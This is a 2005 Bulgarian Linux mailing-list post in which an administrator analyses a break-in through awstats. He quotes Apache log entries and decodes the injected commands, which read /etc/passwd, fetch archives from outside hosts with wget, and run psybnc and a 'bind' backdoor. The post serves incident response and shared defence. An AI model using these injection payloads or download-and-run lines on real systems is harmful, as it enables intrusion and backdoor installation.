Linux-Bulgaria.ORG
навигация

 

начало

пощенски списък

архив на групата

семинари ...

документи

как да ...

 

 

Предишно писмо Следващо писмо Предишно по тема Следващо по тема По Дата По тема (thread)

lug-bg: Re: lug-bg: нещо интересно


  • Subject: lug-bg: Re: lug-bg: нещо интересно
  • From: "D. Dilev" <unionddd@xxxxxx>
  • Date: Fri, 25 Feb 2005 00:01:04 +0200 (EET)

Благодаря на всички за отговорите. Бяха ми полезни.
Машината е пробита през awstats.
Компилирането на psybnc не е минало успешно, но tw port backdoor не е срещнал пречки. 

Пеиствам Ви разследването което направих:

това е от лог файла на апач:

82.96.126.130 - - [22/Feb/2005:22:06:11 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%
3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2fgeocities%2ecom%2fsickady
%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3bmake%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1" 200 14978 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:18 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20h
ttp%3a%2f%2fgeocities%2ecom%2fsickady%2fp%2etgz%3btar%20xvfz%20p%2etgz%3bcd%20psybnc%3b%2e%2fpsybnc%3becho%20e_exp%3b%2500 HTTP/1.1"
 200 13307 "-" "-"
82.96.126.130 - - [22/Feb/2005:22:09:54 +0200] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%
3buname%20%2da%3bid%3becho%20Instalam%20Bind%20in%20%2fvar%2ftmp%3bcd%20%2fvar%2ftmp%3bwget%20www%2epetry%2ese%2fpublic_html%2ftw%2e
tar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20tw%3b%2e%2fbind%3becho%20Instalam%20bind%20in%20%2ftmp%3bcd%20%2ftmp%3bwget%20www%2e
petry%2ese%2fpublic_html%2ftw%2etar%2egz%3btar%20%2dxvzf%20tw%2etar%2egz%3bcd%20rw%3b%2e%2fbind%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d
%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20by%20Zorg%20of%20texter%21%3becho%20e_exp%3b%2500 HTTP/1.1" 200 2686 "-" "
-"


с по-прости думи горе се изпълнява това:

1. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;make;./psybnc;echo e_exp;%00
2. |echo ;echo b_exp;cd /tmp;wget http://geocities.com/sickady/p.tgz;tar xvfz p.tgz;cd psybnc;./psybnc;echo e_exp;%00
3. |echo ;echo b_exp;cat /etc/passwd;uname -a;id;echo Instalam Bind in /var/tmp;cd /var/tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd tw;./bind;echo Instalam bind in /tmp;cd /tmp;wget www.petry.se/public_html/tw.tar.gz;tar -xvzf tw.tar.gz;cd rw;./bind;echo -------------------------;echo by Zorg of texter!;echo e_exp;%00


с други думи :

1. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
make;
./psybnc;
echo e_exp;
%00

2. |echo ;
echo b_exp;
cd /tmp;
wget http://geocities.com/sickady/p.tgz;
tar xvfz p.tgz;
cd psybnc;
./psybnc;
echo e_exp;
%00

3. |echo ;
echo b_exp;
cat /etc/passwd;
uname -a;
id;
echo Instalam Bind in /var/tmp;
cd /var/tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd tw;
./bind;
echo Instalam bind in /tmp;
cd /tmp;
wget www.petry.se/public_html/tw.tar.gz;
tar -xvzf tw.tar.gz;
cd rw;
./bind;
echo -------------------------;
echo by Zorg of texter!;
echo e_exp;%00


след това ги открих тук:

/var/tmp# ls -alu
-rw-r--r--    1 nobody   nobody     605272 Feb 22 22:06 p.tgz
drwxr-xr-x   11 nobody   nobody       4096 Feb 22 22:06 psybnc
drwxr-xr-x    2 nobody   nobody       4096 Feb 22 22:04 tw
-rw-r--r--    1 nobody   nobody      16414 Feb 22 22:04 tw.tar.gz
-rwxr-xr-x    1 nobody   nobody      16414 Feb 22 22:06 x0b

/tmp# ls -alu
-rw-r--r--    1 nobody   nobody     605272 Feb 22 22:06 p.tgz
drwxr-xr-x   11 nobody   nobody       4096 Feb 22 22:09 psybnc
drwxr-xr-x    2 nobody   nobody       4096 Feb 22 22:06 tw
-rw-r--r--    1 nobody   nobody      16414 Feb 22 22:07 tw.tar.gz
-rwxr-xr-x    1 nobody   nobody      16414 Feb 22 22:07 x0b


Поздрави

-----------------------------------------------------------------
http://gbg.bg/search - Изпробвайте още сега най-добрата българска търсачка!
============================================================================
A mail-list of Linux Users Group - Bulgaria (bulgarian linuxers).
http://www.linux-bulgaria.org - Hosted by Internet Group Ltd. - Stara Zagora
To unsubscribe: http://www.linux-bulgaria.org/public/mail_list.html
============================================================================



 

наши приятели

 

линукс за българи
http://linux-bg.org

FSA-BG
http://fsa-bg.org

OpenFest
http://openfest.org

FreeBSD BG
http://bg-freebsd.org

KDE-BG
http://kde.fsa-bg.org/

Gnome-BG
http://gnome.cult.bg/

проект OpenFMI
http://openfmi.net

NetField Forum
http://netField.ludost.net/forum/

 

 

Linux-Bulgaria.ORG

Mailing list messages are © Copyright their authors.